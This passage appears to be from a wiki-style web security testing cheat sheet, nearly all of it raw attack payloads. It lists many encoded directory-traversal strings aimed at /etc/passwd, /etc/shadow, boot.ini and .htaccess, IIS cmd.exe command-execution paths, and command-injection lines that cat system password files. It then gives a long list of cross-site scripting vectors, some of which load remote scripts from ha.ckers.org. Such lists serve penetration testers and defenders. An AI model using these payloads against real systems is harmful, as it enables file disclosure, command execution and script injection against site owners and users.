%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
